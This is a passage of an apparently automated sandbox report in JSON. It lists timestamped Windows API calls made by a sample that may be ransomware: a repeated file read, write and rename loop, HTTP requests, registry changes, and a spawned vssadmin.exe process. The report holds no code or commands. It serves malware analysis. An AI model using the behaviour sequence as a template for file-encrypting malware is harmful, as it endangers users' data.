"filesystem", "timestamp": "2016-02-16 17:42:06,978", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,978", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,978", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:06,988", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,988", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,988", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,988", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,988", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,988", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,988", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,988", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,998", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:06,998", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,998", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,998", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,998", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,998", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,998", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,998", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,008", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,008", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,008", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,008", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,008", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,008", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,019", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,019", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,019", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,019", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,019", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,019", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,019", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,019", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,019", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,029", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,029", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,029", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,029", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,029", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,029", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,029", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,039", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,039", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,039", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,039", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,039", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,039", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,039", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,049", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,049", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,049", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,049", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,049", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,049", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,049", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,049", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,059", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,059", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,059", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,059", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,059", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,059", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,069", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,069", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,069", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,069", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,069", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,069", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,069", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,069", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,079", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,079", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,079", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,079", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,079", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,079", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,079", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,079", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,089", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,089", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,089", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,089", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,089", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,089", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,089", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,089", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,099", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,099", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,099", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,099", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,099", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,099", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,099", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,109", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,109", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,109", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,109", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,109", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,109", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,109", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,109", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,119", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,119", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,119", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,119", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,119", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,119", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,129", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,129", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,129", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,129", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,129", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,129", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,129", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,129", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,139", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,139", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,139", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,139", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,139", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,139", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,139", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,139", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,149", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,149", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,149", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,149", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,149", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,149", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,149", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,149", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,159", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,159", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,159", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,159", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,159", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,159", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,159", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,159", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,179", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,179", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,179", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,179", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,179", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,179", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,179", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,189", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,189", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,189", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,189", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,189", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,189", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,189", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,189", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,189", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,199", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,199", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,199", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,199", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,199", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,199", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,199", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,199", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,209", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,209", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,209", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,209", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,209", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,219", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,219", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,219", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,219", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,219", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,219", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,219", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,219", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,229", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,229", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,229", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,229", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,229", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,229", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,229", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,229", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,239", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,239", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,239", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,239", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,239", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,249", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,249", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,249", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,249", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,249", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,249", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,249", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,259", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,259", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,259", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,259", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,259", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,259", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,269", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,269", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,279", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,279", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,279", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,279", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,279", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,289", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,289", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,289", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,289", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,289", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,289", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,299", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,299", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,309", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,309", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,309", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,309", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,309", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,309", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,309", "api": "NtFreeVirtualMemory"}, {"category": "network", "timestamp": "2016-02-16 17:42:07,319", "api": "InternetConnectA"}, {"category": "network", "timestamp": "2016-02-16 17:42:07,319", "api": "HttpOpenRequestA"}, {"category": "network", "timestamp": "2016-02-16 17:42:07,649", "api": "HttpSendRequestA"}, {"category": "network", "timestamp": "2016-02-16 17:42:07,649", "api": "InternetReadFile"}, {"category": "network", "timestamp": "2016-02-16 17:42:07,649", "api": "InternetCloseHandle"}, {"category": "network", "timestamp": "2016-02-16 17:42:07,649", "api": "InternetCloseHandle"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,649", "api": "NtFreeVirtualMemory"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,649", "api": "NtFreeVirtualMemory"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,649", "api": "NtFreeVirtualMemory"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,649", "api": "NtFreeVirtualMemory"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,649", "api": "NtFreeVirtualMemory"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,649", "api": "NtFreeVirtualMemory"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,649", "api": "NtFreeVirtualMemory"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,649", "api": "NtFreeVirtualMemory"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,649", "api": "NtFreeVirtualMemory"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,649", "api": "NtFreeVirtualMemory"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,649", "api": "NtFreeVirtualMemory"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,649", "api": "NtFreeVirtualMemory"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,649", "api": "NtFreeVirtualMemory"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,649", "api": "NtFreeVirtualMemory"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,649", "api": "NtFreeVirtualMemory"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,659", "api": "NtFreeVirtualMemory"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,659", "api": "NtFreeVirtualMemory"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,659", "api": "NtFreeVirtualMemory"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,659", "api": "NtFreeVirtualMemory"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,659", "api": "NtFreeVirtualMemory"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,659", "api": "NtFreeVirtualMemory"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,659", "api": "NtFreeVirtualMemory"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,659", "api": "NtFreeVirtualMemory"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,659", "api": "NtFreeVirtualMemory"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,659", "api": "NtFreeVirtualMemory"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,659", "api": "NtFreeVirtualMemory"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,659", "api": "NtFreeVirtualMemory"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,659", "api": "NtFreeVirtualMemory"}, {"category": "threading", "timestamp": "2016-02-16 17:42:07,659", "api": "ExitThread"}, {"category": "registry", "timestamp": "2016-02-16 17:42:07,659", "api": "RegSetValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:42:07,659", "api": "RegDeleteValueA"}, {"category": "registry", "timestamp": "2016-02-16 17:42:07,659", "api": "RegCreateKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:07,659", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:07,659", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:07,659", "api": "RegCreateKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:07,659", "api": "RegSetValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:07,659", "api": "RegCloseKey"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,659", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,659", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,659", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,659", "api": "FindFirstFileExW"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,669", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,669", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,689", "api": "NtWriteFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,699", "api": "NtFreeVirtualMemory"}, {"category": "registry", "timestamp": "2016-02-16 17:42:07,699", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:42:07,699", "api": "RegSetValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:42:07,699", "api": "RegSetValueExA"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,699", "api": "NtCreateFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,699", "api": "NtCreateSection"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,699", "api": "ZwMapViewOfSection"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,699", "api": "NtQueryInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,699", "api": "NtFreeVirtualMemory"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,790", "api": "ShellExecuteExW"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,870", "api": "ShellExecuteExW"}, {"category": "registry", "timestamp": "2016-02-16 17:42:07,870", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:07,870", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:42:07,870", "api": "RegCloseKey"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,870", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,870", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,870", "api": "MoveFileWithProgressW"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,940", "api": "CreateProcessInternalW"}]}, {"parent_id": 1592, "process_name": "vssadmin.exe", "process_id": 1840, "first_seen": "2016-02-16 17:41:36,314", "calls": [{"category": "registry", "timestamp": "2016-02-16 17:41:36,314", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:36,314", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:36,314", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:36,314", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:36,314", "api": "NtOpenKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:36,314", "api": "NtOpenKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:36,314", "api": "NtOpenKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:36,314", "api": "NtQueryValueKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:36,314", "api": "NtQueryValueKey"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,314", "api": "LdrGetDllHandle"}, {"category": "device", "timestamp": "2016-02-16 17:41:36,324", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:41:36,324", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:41:36,324", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:41:36,324", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:41:36,324", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:41:36,324", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:41:36,324", "api": "DeviceIoControl"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,324", "api": "LdrGetDllHandle"}, {"category": "registry", "timestamp": "2016-02-16 17:41:36,324", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:36,324", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:36,324", "api": "RegCloseKey"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,324", "api": "LdrLoadDll"}, {"category": "registry", "timestamp": "2016-02-16 17:41:36,324", "api": "NtOpenKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:36,324", "api": "NtOpenKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:36,324", "api": "NtQueryValueKey"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,324", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,324", "api": 